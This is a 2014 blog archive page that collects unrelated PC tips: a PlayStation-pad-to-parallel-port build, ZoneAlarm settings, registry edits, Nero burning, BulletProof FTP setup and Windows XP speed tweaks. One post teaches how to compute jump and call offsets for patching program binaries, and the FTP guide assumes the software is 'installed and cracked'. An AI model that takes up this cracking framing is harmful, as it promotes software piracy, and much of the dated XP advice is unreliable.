Google+ Badge

Sunday, 12 January 2014

connect A Psx Pad To Pc, Warning soldering is involved..

If you are feeling adventurous ...

If you have a PlayStation and a PC, and do not have a pad for the computer, or simply those that there are in the market seem to you too expensive or any you don't like, you have a great option here. It connects your PlayStation pad (anyone) to your PC conserving ALL its functionality thanks to the excellent driver DirectPad.



It enjoys the ample range of pads that exists mainly for PlayStation and, of its compared price those of PC (speaking in terms quality-price).


They work for all pads including the dual-shock pads. Also, with the dual-shock ones you will be able to use both analog controls and the capacity for "vibrating" (Force Feedback) in Windows games that support it (Need Speed III, Incoming, Star Wars Rogue Squadron, Flight Simulator, Forsaken, etc). If you want to see the complete list of games that support the Force Feedback, look here.


You will be able to use ALL the buttons of PlayStation pad in your preferred games, altogether 10 if you use digitals or 16 if you use the analog control.


You can connect simultaneously up to two pads.


With the dual-shock pads you will be able to change between the digital control to analog during any game session.


If you already have standard PC pad you will be able to use it simultaneously without losing functionality in either of them (if connecting two joysticks/pads by a Y connector and to the game port, you will only be able to use 2 buttons in each joystick/pad)


The assembly is not very complicated.


In theory it would have to work with any control system of game for PlayStation (pad of another mark, steering wheel, etc).



You will only be able to use it in Windows games, since driver it is programmed for DirectX.


If you want to use the dual-shock you will need an external power supply, or steal power from inside the computer.


The connection goes to the parallel port, which means that if you are going to use the printer you change connectors... but it is worth the trouble!

Words before beginning

Following with the preliminaries, I will going to make clear that you do not need any knowledge electronics, although knowing how to solder and know how to handle a multi-meter. If you do not have any idea, or don't want to do it get a friend who knows to help you.

Configuring ZoneAlarm Pro Security Settings, A ZoneAlarm Pro Tutorial

 Configuring ZoneAlarm Security Settings

If you're running ZoneAlarm Pro you will probably have considered that most of the "advanced" settings might as well be in Chinese for all the use they are. User friendly they are not!

If you are not on a LAN (connected to another computer in a network) you can use this guide to give your firewall some real muscle and a new lease of life:

Launch ZoneAlarm Pro and click to highlight the "Firewall" tab on the left hand side . In the pane that appears on the right hand side in the section "Internet Zone Security" set the slider control to "High" Then click the "Custom" button in the same section.

The next settings page is divided into two sections with tabs Internet Zone and Trusted Zone at the top of the page. Under the Internet Zone tab there is a list of settings that can be accessed by scrolling. At the top is the high security settings and the only thing that should check from there is "allow broadcast/multicast". The rest should be unchecked.

Scroll down until you get to the medium security settings area. Check all the boxes in this section until you get to "Block Incomming UDP Ports". When you check that you will be asked to supply a list of ports, and in the field at the bottom of the page enter 1-65535

Then go back to the list and check the box alongside "Block Outgoing UDP Ports" and at the bottom of the page enter 1-19, 22-79, 82-7999, 8082-65535

Repeat this proceedure for the following settings
"Block Incomming TCP Ports": 1-65535
"Block Outgoing TCP Ports": 1-19, 22-79, 82-7999, 8082-65535
Then click "Apply", "Ok" at the bottom of the page.

Back in the right hand "Firewall" pane go next to the yellow "Trusted Zone Security" section and set it to "high" with the slider. Click "Custom" and repeat the above proceedure this time choosing the Trusted Zone tab at the top of the settings page.

These settings will stop all incoming packets @ports 1-65535 and also block all pings, trojans etc... this will also stop all spyware or applications from phoning home from your drive without your knowledge!
anilworld89 blog

Computer Matinence

You may not realize it, but your computer and your car have something in common: they both need regular maintenance. No, you don't need to change your computer's oil. But you should be updating your software, keeping your antivirus subscription up to date, and checking for spyware. Read on to learn what you can do to help improve your computer's security.

Getting started

Here are some basics maintenance tasks you can do today to start improving your computer's security. Be sure you make these part of your ongoing maintenance as well.

* Sign up for software update e-mail notices. Many software companies will send you e-mail whenever a software update is available. This is particularly important for your operating system (e.g., Microsoft VV!|VD0VV$® or Macintosh), your antivirus program, and your firewall.
* Register your software. If you still have registration forms for existing software, send them in. And be sure to register new software in the future. This is another way for the software manufacturer to alert you when new updates are available.
* Install software updates immediately.
When you get an update notice, download the update immediately and install it. (Remember, downloading and installing are two separate tasks.)
An ounce of prevention

A few simple steps will help you keep your files safe and clean.

* Step 1: Update your software
* Step 2: Backup your files
* Step 3: Use antivirus software and keep it updated
* Step 4: Change your passwords

Developing ongoing maintenance practices

Now that you've done some ground work, it's time to start moving into longer term maintenance tasks. These are all tasks that you should do today (or as soon as possible) to get started. But for best results, make these a part of a regular maintenance schedule. We recommend setting aside time each week to help keep your computer secure.

* Back up your files. Backing up your files simply means creating a copy of your computer files that you can use in the event the originals are lost. (Accidents can happen.) To learn more read our tips for backing up information.

* Scan your files with up to date antivirus software. Use your antivirus scan tool regularly to search for potential computer viruses and worms. Also, check your antivirus program's user manual to see if you can schedule an automatic scan of your computer. To learn more, read our tips for reducing your virus risk
* Change your passwords. Using the same password increases the odds that someone else will discover it. Change all of your passwords regularly (we recommend monthly) to reduce your risk. Also, choose your passwords carefully. To learn more, read our tips for creating stronger passwords

Making a schedule

One of the best ways to help protect your computer is to perform maintenance regularly. To help you keep track, we suggest making a regular "appointment" with your computer. Treat it like you would any other appointment. Record it in your datebook or online calendar, and if you cannot make it, reschedule. Remember, you are not only helping to improve your computer, you are also helping to protect your personal information.

Computer Acronyms

ADSL - Asymmetric Digital Subscriber Line
AGP - Accelerated Graphics Port
ALI - Acer Labs, Incorporated
ALU - Arithmetic Logic Unit
AMD - Advanced Micro Devices
APC - American Power Conversion
ASCII - American Standard Code for Information Interchange
ASIC - Application Specific Integrated Circuit
ASPI - Advanced SCSI Programming Interface
AT - Advanced Technology
ATI - ATI Technologies Inc.
ATX - Advanced Technology Extended

--- B ---
BFG - BFG Technologies
BIOS - Basic Input Output System
BNC - Barrel Nut Connector

--- C ---
CAS - Column Address Signal
CD - Compact Disk
CDR - Compact Disk Recorder
CDRW - Compact Disk Re-Writer
CD-ROM - Compact Disk - Read Only Memory
CFM - Cubic Feet per Minute (ft�/min)
CMOS - Complementary Metal Oxide Semiconductor
CPU - Central Processing Unit
CTX - CTX Technology Corporation (Commited to Excellence)

--- D ---

DDR - Double Data Rate
DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
DFI - DFI Inc. (Design for Innovation)
DIMM - Dual Inline Memory Module
DRAM - Dynamic Random Access Memory
DPI - Dots Per Inch
DVD - Digital Versatile Disc
DVD-RAM - Digital Versatile Disk - Random Access Memory

--- E ---
ECC - Error Correction Code
ECS - Elitegroup Computer Systems
EDO - Extended Data Out
EEPROM - Electrically Erasable Programmable Read-Only Memory
EPROM - Erasable Programmable Read-Only Memory
EVGA - EVGA Corporation

--- F ---
FC-PGA - Flip Chip Pin Grid Array
FDC - Floppy Disk Controller
FDD - Floppy Disk Drive
FPS - Frame Per Second
FPU - Floating Point Unit
FSAA - Full Screen Anti-Aliasing
FS - For Sale
FSB - Front Side Bus

--- G ---
GB - Gigabytes
GBps - Gigabytes per second or Gigabits per second
GDI - Graphical Device Interface
GHz - GigaHertz

--- H ---
HDD - Hard Disk Drive
HIS - Hightech Information System Limited
HP - Hewlett-Packard Development Company
HSF - Heatsink-Fan

--- I ---
IBM - International Business Machines Corporation
IC - Integrated Circuit
IDE - Integrated Drive Electronics
IFS- Item for Sale
IRQ - Interrupt Request
ISA - Industry Standard Architecture
ISO - International Standards Organization

--- J ---
JBL - JBL (Jame B. Lansing) Speakers
JVC - JVC Company of America

- K ---
Kbps - Kilobits Per Second
KBps - KiloBytes per second

--- L ---
LG - LG Electronics
LAN - Local Area Network
LCD - Liquid Crystal Display
LDT - Lightning Data Transport
LED - Light Emitting Diode

--- M ---
MAC - Media Access Control
MB � MotherBoard or Megabyte
MBps - Megabytes Per Second
Mbps - Megabits Per Second or Megabits Per Second
MHz - MegaHertz
MIPS - Million Instructions Per Second
MMX - Multi-Media Extensions
MSI - Micro Star International

--- N ---
NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card

--- O ---
OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer

--- P ---
PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit

--- R ---
RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Convertor
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute

--- S ---
SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface

--- T ---
TB - Terabytes
TBps - Terabytes per second
Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name

--- U ---
UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshieled Twisted Pair

--- V ---
VCD - Video CD
VPN - Virtual Private Network

--- W ---
WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get

--- X ---
XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology

Clear Unwanted Items From Add And Remove

Clear Unwanted Items From Add And Remove

Run the Registry Editor (REGEDIT).
Open HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Uninstall, and remove any unwanted subkeys under "Uninstall."

Choosing A Good Domain Name, ya..good name is important!

Another good tip for successful web experience..injoy it!

Choosing A Good Domain Name

Choosing a domain name for your site is one of the most important steps towards creating the perfect internet presence. If you run an on-line business, picking a name that will be marketable and achieve success in search engine placement is paramount. Many factors must be considered when choosing a good domain name. This article summarizes all the different things to consider before making that final registration step!

Short and Sweet

Domain names can be really long or really short (1 - 67 characters). In general, it is far better to choose a domain name that is short in length. The shorter your domain name, the easier it will be for people remember. Remembering a domain name is very important from a marketability perspective. As visitors reach your site and enjoy using it, they will likely tell people about it. And those people may tell others, etc. As with any business, word of mouth is the most powerful marketing tool to drive traffic to your site (and it's free too!). If your site is long and difficult to pronounce, people will not remember the name of the site and unless they bookmark the link, they may never return.

Consider Alternatives

Unless a visitor reaches your site through a bookmark or a link from another site, they have typed in your domain name. Most people on the internet are terrible typists and misspell words constantly. If your domain name is easy to misspell, you should think about alternate domain names to purchase. For example, if your site will be called "", you should also consider buying "" and "". You should also secure the different top level domain names besides the one you will use for marketing purposes ("", "", etc.) You should also check to see if there are existing sites based on the misspelled version of the domain name you are considering. "" may be available, but "" may be home to a graphic pornography site. You would hate for a visitor to walk away thinking you were hosting something they did not expect.

Also consider domain names that may not include the name of your company, but rather what your company provides. For example, if the name of your company is Mike's Tools, you may want to consider domain names that target what you sell. For example: "" or "". Even though these example alternative domain names do not include the name of your company, it provides an avenue for visitors from your target markets. Remember that you can own multiple domain names, all of which can point to a single domain. For example, you could register "", "", and "" and have "" and "" point to "".

Hyphens: Your Friend and Enemy

Domain name availability has become more and more scant over the years. Many single word domain names have been scooped up which it makes it more and more difficult to find a domain name that you like and is available. When selecting a domain name, you have the option of including hyphens as part of the name. Hyphens help because it allows you to clearly separate multiple words in a domain name, making it less likely that a person will accidentally misspell the name. For example, people are more likely to misspell "" than they are "". Having words crunched together makes it hard on the eyes, increasing the likelihood of a misspelling. On the other hand, hyphens make your domain name longer. The longer the domain name, the easier it is for people to forget it altogether. Also, if someone recommends a site to someone else, they may forget to mention that each word in the domain name is separated by a hyphen. If do you choose to leverage hyphens, limit the number of words between the hyphens to three. Another advantage to using hyphens is that search engines are able to pick up each unique word in the domain name as key words, thus helping to make your site more visible in search engine results.

Dot What?

There are many top level domain names available today including .com, .net, .org, and .biz. In most cases, the more unusual the top level domain, the more available domain names are available. However, the .com top level domain is far and away the most commonly used domain on the internet, driven by the fact that it was the first domain extension put to use commercially and has received incredible media attention. If you cannot lay your hands on a .com domain name, look for a .net domain name, which is the second most commercially popular domain name extension.

Long Arm of the Law

Be very careful not to register domain names that include trademarked names. Although internet domain name law disputes are tricky and have few cases in existence, the risk of a legal battle is not a risk worth taking. Even if you believe your domain name is untouchable by a business that has trademarked a name, do not take the chance: the cost of litigation is extremely high and unless you have deep pockets you will not likely have the resources to defend yourself in a court of law. Even stay away from domain names in which part of the name is trademarked: the risks are the same.

Search Engines and Directories

All search engines and directories are different. Each has a unique process for being part of the results or directory listing and each has a different way of sorting and listing domain names. Search engines and directories are the most important on-line marketing channel, so consider how your domain name choice affects site placement before you register the domain. Most directories simply list links to home pages in alphabetical order. If possible, choose a domain name with a letter of the alphabet near the beginning ("a" or "b"). For example, "" will come way above "". However, check the directories before you choose a domain name. You may find that the directories you would like be in are already cluttered with domain names beginning with the letter "a". Search engines scan websites and sort results based on key words. Key words are words that a person visiting a search engine actually search on. Having key words as part of your domain name can help you get better results.

Calculating Offsets


This tutorial is more of a tip than a tutorial. It just explains how to calculate offsets for jumps and calls within the program you are patching.

Types of Jumps/Calls

Here I will just describe the different types of jumps and calls which you will come across:

Short Jumps
Short jumps be they conditional or unconditional jumps are 2 bytes long (or 1 nibble if your Californian ;-). These are relative jumps taken from the first byte after the two bytes of the jump. Using short jumps you can jump a maximum of 127 bytes forward and 128 bytes backwards.

Long Jumps
Long jumps if they are relative are 6 bytes long for conditional jumps and are 5 bytes long for unconditional jumps. For conditional jumps 2 bytes are used to identify that it is a long jump and what type of jump (je, jg, jns etc) it is. The other 4 bytes are used to show how far away the target location is relative to the first byte after the jump. In an unconditional jump only 1 byte is used to identify it as a long unconditional jump and the other 4 are used to show it's target's relative position, as with the conditional jumps.

There are two different types of calls which we will use. The normal type of call works the same as the long jumps in that it is relative to it's current position. The other type gives a reference to a memory location, register or stack position which holds the memory location it will call. The position held by the later is direct e.g. the memory location referenced may contain 401036h which would be the exact position that you would call, not relative to the position of the call. The size of these types of calls depends on any calculations involved in the call i.e. you could do: 'call dword ptr [eax * edx + 2]'. Long jumps can also be made using this method, but I didn't say that earlier as to avoid repetition.

Here is a brief list of all the different types of jumps/calls and their appropriate op-codes. Where different jumps have the same Op-Codes I have grouped them:

Jump Description Short Op-Code Long Op-Code
call procedure call E8xxxxxxxx N/A
jmp u nconditional jump EBxx E9xxxxxxxx
ja/jnbe jump if above 77xx 0F87xxxxxxxx
jae/jnb/jnc jump if above or equal 73xx 0F83xxxxxxxx
jb/jc/jnae jump if below 72xx 0F82xxxxxxxx
jbe/jna jump if below or equal 76xx 0F86xxxxxxxx
jcxz/jecxz jump if cx/ecx equals zero E3xx N/A
je/jz jump if equal/zero 74xx 0F84xxxxxxxx
jne/jnz jump if not equal/zero 75xx 0F85xxxxxxxx
jg/jnle jump if greater 7Fxx 0F8Fxxxxxxxx
jge/jnl jump if greater or equal 7Dxx 0F8Dxxxxxxxx
jl/jnge jump if less 7Cxx 0F8Cxxxxxxxx
jle/jng jump if less or equal 7Exx 0F8Exxxxxxxx
jno jump if not overflow 71xx 0F81xxxxxxxx
jnp/jpo jump if no parity/parity odd 7Bxx 0F8Bxxxxxxxx
jns jump if not signed 79xx 0F89xxxxxxxx
jo jump if overflow 70xx 0F80xxxxxxxx
jp/jpe jump if parity/parity even 7Axx 0F8Axxxxxxxx
js jump if sign 78xx 0F88xxxxxxxx

Calculating Offsets (finding in the xx's in table)

You will need to be able to calculate offsets when you add jumps and make calls within and to the code you have added. If you choose to do this by hand instead of using a tool then here are the basics:

For jumps and calls further on in memory from your current position you take the address where you want to jump/call and subtract from it the memory location of the next instruction after your call/jump i.e.:

(target mem address) - (mem location of next instruction after call/jump)

If we wanted to jump to 4020d0 and the next instruction *after* the jump is at location 401093 then we would use the following calculation:

4020d0 - 401093 = 103d

We then write the jump instruction in hex as e93d100000 where e9 is the hex op-code for a long relative jump and 3d100000 is the result of our calculation expanded to dword size and reversed.

For jumps and calls to locations *before* the current location in memory you take the address you want to call/jump to and subtract it from the memory location of the next instruction after your call/jump, then subtract 1 and finally perform a logical NOT on the result i.e.

NOT(mem address of next instruction - target mem address - 1)

If we wanted to call location 401184 and the address of the next instruction after the call is 402190 then we do the following calculation:

NOT(402190 - 401184 - 1 ) = ffffeff4

We can then write our call instruction in hex as e8f4efffff where e8 is the hex op-code for relative call and f4efffff is the result of the calculation in reverse order.

If you want to practice with different examples then the best way to do this is to use a disassembler like WDASM which shows you the op-codes and try and work out the results yourself. Also as an end note you don't have to perform these calculations if you have enough room to make your jump or call instruction into an absolute jump call by doing the following as represented in assembler:

mov eax, 4020d0
call eax (or jmp eax)

Final Notes

Make life easier and use a program to do this ;-)


Burn a BIN without a CUE using NERO

Burn a BIN without a CUE using NERO

You've downloaded a *.BIN file, but there was no *.CUE file associated and you still want to burn the *.BIN file using Nero

Your options are:

1) Create yourself a *.CUE

2) Convert the *.BIN to an *.ISO

3) OR use Nero to burn without the *.CUE file!!!

Yes, that's possible... just follow these steps and you will be sorted. No need for *.CUE files anymore

Ok, here we go...

1) Start Nero

2) File -> Burn Image

3) Browse to the *.BIN file that you want to burn and open it

4) A window saying "Foreign Image Settings" will open

5) Check the settings. They should be as followed:

* Type of image: leave it to Data Mode 1
* Select the Raw Data check box
Note ->> The block size will change automatically from 2048 to 2352
* Leave Image Header and Image Trailer unchanged and set to 0
* Leave "Scrambled" and "Swapped" check boxes unchecked

6) Click on burn!

7) Enjoy

This tut was for Nero 5.x.x.x, I was told that "Burn Image" is under "recorder" in Nero 6. The rest of the steps should be the same...

Burn .bin file Without A .cue file

 To burn a bin file, you will need an appropriate cue file.

You do exactly the same as for iso files, but when you click on “burn image,” you don’t browse to the bin itself, but instead to the cue file, and you open that one.
When the writer starts to burn, it will automatically search for the bin file and start burning it. In fact, the cue file tells the burning program where it can find the bin file that is attached to it. It is VERY IMPORTANT that you use the right cue file when you burn a bin. i.e both cue and bin files that are attached to each other must be located in the same folder, and every bin file has it’s own cue file.

Normally, when you download a bin file, you can download the appropriate cue file as well. If you do not have the cue file (or feel bold) you can make the cue file yourself, which is really easy to do:

a. Open notepad

b. Copy the folowing text into notepad:

TRACK 01 MODE1/2352
INDEX 01 00:00:00

Where nameofimage.bin is the name of the bin file you want ot burn.

c. The rest is easy: just save the notepad text with the name of the bin, but with the cue extension.

d. The file should be saved in the same folder as its appropriate bin file and should be something like myfile.cue

Or you can use Alcohol 120% to burn directly from the bin file

Broken Ie, How to fix it

So one of your friends, “not you of course”, has managed to nuke Internet Explorer and they are unsure how they did it. You’ve eliminated the possibility of viruses and adware, so this just leaves you and a broken IE. Before you begin to even consider running a repair install of the OS, let’s try to do a repair on IE instead.


Start the Registry Editor by typing regedit from the Run box. Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Active Setup \ Installed Components \ {89820200-ECBD-11cf-8B85-00AA005B4383} and then right-click the “IsInstalled value.” Click Modify. From there, you will change the value from 1 to 0. All right, go ahead and close the editor and reinstall IE from this location. /


If messing with the registry and something goes horribly wrong, you can use “Last Known Good Configuration (F8 Safe Mode)” or a Restore Point to get back to where you were before, with your settings. Then you can try again, this time taking care to watch the portion of the registry you are changing. Most people who have troubles with this end up changing the wrong registry key.

Hope this tut helps some members.

Boot Winxp Fast

Boot Winxp Fast

Follow the following steps

1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:\
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.

BulletProof FTP Server Tutorial

thanks to someone for this tut.

Configuring your Bulletproof FTP Server Tutorial

I am not sure where I found this tutorial, It’s been a while…It might even have been here... ..So if it is one of yours, my hat goes off to you once again....

After reading the excellent tutorial on "Creating an FTP" that Norway posted…

(I would suggest reading and following his tutorial first, then following up with this one)

I thought that perhaps this tutorial might be pretty helpful for those interested in knowing how to configure their Bulletproof FTP Server that don't already know how... Here's how to get started…

This is for the BulletProof FTP Server 2.10. However, It should work fine on most following versions as well.

I'm assuming you have it installed and cracked.

1. Start the program.
2. Click on Setup > Main > General from the pull-down menu.
3. Enter your server name into the 'Server Name' box. Under Connection set the “Max number of users" to any number. This is the limit as to how many users can be on your sever at any time.
4. Click on the 'options' tab of that same panel (on the side)
5. Look at the bottom, under IP Options. Put a check in the box “Refuse Multiple Connections from the same IP”. This will prevent one person from blocking your FTP to others.
6. Also put a check in the 'Blocked Banned IP (instead of notifying client). VERY IMPORTANT! If somebody decides to 'Hammer' (attempt to login numerous times VERY quickly) your server/computer may CRASH if you don't enable this.
7. Click on the 'advanced' tab
8. At the bottom again look at the 'hammering area'
9. Enable 'anti-hammer' and 'do not reply to people hammering' Set it for the following: Block IP 120 min if 5 connections in 60 sec. You can set this at whatever you want to but that is pretty much a standard Click 'OK'

Adding Users
11. Setup > User accounts form pull-down.
12. Right click in the empty 'User Accounts' area on the right: choose 'Add'
13. Enter account name. (ie: logon name)
14. In the 'Access rights' box right click: choose ‘Add’.
15. Browse until you find the directory (folder) you want to share. In the right column you will see a bunch of checkboxes. Put a check in the following ones: Read, Write, Append, Make, List, and +Subdirs. Press 'select'.
16. Enter a password for your new FTP account.
17. Click on 'Miscellaneous' in the left column. Make sure 'Enable Account' is selected. Enable 'Max Number of Users' set it at a number other than zero. 1 for a personal account and more that one for a group account. Enable 'Max. no. of connects per IP' set it at 1

18. Under 'Files' enable 'show relative path' this is a security issue. A FTP client will now not be able to see the ENTIRE path of the FTP. It will only see the path from the main directory. Hide hidden flies as well.
Put a tick in both of these.

You don't need to do any of this stuff, but It will help tweak your server and help you maintain order on it. All of the following will be broken down into small little areas that will tell you how to do one thing at a time.

Changing the Port
The default port is always 21, but you can change this. Many ISPs will routinely do a scan of its own users to find a ftp server, also when people scan for pubs they may scan your IP, thus finding your ftp server. If you do decide to change it many suggest that you make the port over 10,000.
1. Setup > Main > General
2. In the 'Connection' Area is a setting labeled 'Listen on Port Number:'
3. Make it any number you want. That will be your port number.
4. Click 'OK'

Making an 'Upload Only' or 'Download Only' ftp server.
This is for the entire SERVER, not just a user.
1. Setup > Main > Advanced
2. In the advanced window you will have the following options: uploads and downloads, downloads only, and uploads only. By default upload and download will be checked. Change it to whatever you want.
3. Click 'OK’

While you are running your server, usually you will end up spending more time at your computer than you normally do. Don't be afraid to ban IP's. Remember, on your FTP you do as you want.

When you are online you must also select the open server button next to the on-line button which is the on-line Button

You also have to use the actual Numbered ip Address ie:

Or even Better yet, get a address


23 Ways To Speed WinXP, Not only Defrag

Since defragging the disk won't do much to improve Windows XP performance, here are 23 suggestions that will. Each can enhance the performance and reliability of your customers' PCs. Best of all, most of them will cost you nothing.
1.) To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.

2.) If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.

3.) Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.

4.) Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.

The idea is that the user can search for a word, phrase, or property inside a document, should they have hundreds or thousands of documents and not know the file name of the document they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for.

Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of documents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature, I recommend disabling it.

Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button.

5.) Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS. For more information on how to configure your BIOS properly, see this article on my site.

6.) Empty the Windows Prefetch folder every three months or so. Windows XP can "prefetch" portions of data and applications that are used frequently. This makes processes appear to load faster when called upon by the user. That's fine. But over time, the prefetch folder may become overloaded with references to files and applications no longer in use. When that happens, Windows XP is wasting time, and slowing system performance, by pre-loading them. Nothing critical is in this folder, and the entire contents are safe to delete.

7.) Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files.

8.) In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel.

9.) Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear.

10.) Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search & Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it. For more information on removing Spyware visit this Web Pro News page.

11.) Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts. Unsure what some items are? Visit the WinTasks Process Library. It contains known system processes, applications, as well as spyware references and explanations. Or quickly identify them by searching for the filenames using Google or another Web search engine.

12.) Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel.

13.) Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness.

14.) If your customer is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP.

15.) Visit Microsoft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion.

16.) Update the customer's anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability.

17.) Make sure the customer has fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system.

18.) Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data.

19.) Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced.

20.) If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free.

21.) Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations.

22.) If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect.

23.) At least once a year, open the computer's cases and blow out all the dust and debris. While you're in there, check that all the fans are turning properly. Also inspect the motherboard capacitors for bulging or leaks. For more information on this leaking-capacitor phenomena, you can read numerous articles on my site.

Following any of these suggestions should result in noticeable improvements to the performance and reliability of your customers' computers. If you still want to defrag a disk, remember that the main benefit will be to make your data more retrievable in the event of a crashed drive.

16x Dvd+-rw Dl Dvd Writer Comparison Guide

16x Dvd+-rw Dl Dvd Writer Comparison Guide


